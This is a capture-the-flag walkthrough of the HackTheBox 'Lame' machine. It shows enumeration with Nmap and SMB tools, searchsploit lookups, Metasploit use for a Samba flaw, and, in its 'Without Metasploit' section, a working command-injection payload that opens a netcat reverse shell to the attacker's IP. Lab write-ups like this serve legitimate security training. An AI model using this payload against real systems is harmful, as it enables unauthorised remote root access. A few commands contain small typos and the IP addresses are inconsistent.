Lame is a beginner-friendly box available on HackTheBox. In this walkthrough, I’ll go through Nmap, SMB file shares, anonymous FTP logins, Searchsploit, and Metasploit to tackle this machine.
Insights
- Vulnerability Scanning: Utilizing tools like Nmap to identify open ports and potential weaknesses in services on a target system.
- Exploitation Techniques: Employing both automated tools (e.g., Metasploit) and manual methods to leverage discovered vulnerabilities and gain deeper access.
- Privilege Escalation: Exploring and exploiting configurations, misconfigurations, or vulnerabilities to elevate privileges from a standard user to higher-level access, such as root.
User Flag
Beginning with an Nmap scan, I observed FTP allowing anonymous logins, an active SSH server, and an SMB file share.
Attempting to connect to the FTP server with anonymous login, I was directed to an empty directory, leading me to shift my focus elsewhere.
Given that there’s an SMB fileshare available, my next step was to enumerate the share using smbmap.
└─$ smbmap -H 10.129.213.17
tmp READ, WRITE oh noes!
Observing the results, I noticed a hint: there’s read/write access to a specific file, accompanied by an intriguing message. This prompted me to attempt a connection to the /tmp share using smbclient.
However, I encountered a snag: there seems to be compatibility issues between older SMB servers and the current smbclient. To address this, I edited the smb.conf file to append client min protocol=NT1 under the [global] section. With this modification, I proceeded to establish a connection.
└─$smbclient -N //10.10.15.75/tmp --option='client min protocol=NT1'
From the data I gathered using the Nmap scan, I identified the versions of both the FTP and SSH services. With this information in hand, I turned to searchsploit to check if there were any documented vulnerabilities for these specific versions.
└─$ searchsploit vsftpd 2.3.4
-------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command | unix/remote/17491.rb
vsftpd 2.3.4 - Backdoor Command | unix/remote/49757.py
-------------------------------- ---------------------------------
Shellcodes: No Results
Upon noticing a ruby script in the results, it indicated the possibility of an existing Metasploit module for the exploit.
I proceeded to launch msfconsole and initiated a search for the relevant exploit to confirm its availability.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Unfortunately, the exploit didn’t produce the desired results. It appears that the box has been patched or has some defensive measures in place against this specific vulnerability.
Given this outcome, I shifted my focus to another potential target: the SMB service.
Exploit
└─$ searchsploit samba 3.0.20
------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflo | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflo | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Serv | linux_x86/dos/36741.py
------------------------------------- ---------------------------------
Shellcodes: No Results
Upon noticing another ruby script, I opted to search for it within Metasploit, hoping to utilize a pre-made module to ease the exploitation process.
Once the module is loaded in Metasploit, it’s vital to configure the necessary parameters. Specifically, the RHOSTS should be set to the IP address of the target machine. For the LHOST, typically, the assigned IP over the HTB VPN is used. A quick way to fetch this IP is by referring to the tun0 interface, provided that’s the only active VPN connection at the moment.
Find Command
The find command is a versatile tool in the UNIX and Linux arsenal. It enables users to traverse through a directory structure and locate files based on various criteria, be it name, age, permissions, or even more intricate parameters.
One of the command’s powerful features is its ability to pair the search operation with subsequent actions via the -exec flag. This allows for dynamic operations to be performed on the files or directories that match the search criteria, all in one command.
Leveraging the access the discovered exploit provided, which was root in this case, I utilized the find command to efficiently locate both of the flags without the need to manually trawl through the filesystem.
find / -type f -name "user.txt" 2</dev/null [user flag]
Root Flag
find / -type f -name "root.txt" 2</dev/null [root flag]
Without Metasploit
Given that this box is designed in the vein of OSCP, it’s pertinent to detail a manual exploitation approach as well. Such a methodology not only provides a deeper understanding of the underlying vulnerabilities but also fine-tunes one’s skills for scenarios where automation tools might not be available or suitable.
Given that we have access to the shared drive over SMB, one avenue for manual exploitation is manipulating the user context. The login command in SMB offers an opportunity here, allowing users to switch their context to another user, provided they possess the requisite credentials or have identified a misconfiguration. Exploring this vector could potentially open new avenues for deeper access or further information disclosure.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.15.75 31337`"
Ensure you configure a netcat listener in anticipation of the incoming connection. Proper setup is crucial for this step to succeed.
And just like that, we’ve successfully rooted another box, this time without leaning on Metasploit! It’s always rewarding to accomplish tasks using manual techniques, as it provides a deeper understanding of the underlying processes.
Summary
While working on the “Lame” box on HackTheBox, I began with an Nmap scan which revealed an FTP server, SSH server, and an SMB file share. The FTP server didn’t provide much, but the SMB fileshare caught my attention. I encountered a compatibility issue with the old SMB server, but after some research, I managed to resolve it. Using details from the Nmap scan, I tried to identify vulnerabilities in the FTP and SMB services. My initial attempt using a Metasploit exploit for the FTP wasn’t successful, but I eventually found a working exploit for the SMB service. With the UNIX’s find command, I located both user and root flags. Wanting to understand the process better, I also tried a manual exploitation of the box without Metasploit. By manipulating SMB user contexts and setting up a netcat listener, I managed to gain deeper access. Through this process, I learned a lot and appreciated the nuances of both automated and hands-on techniques.
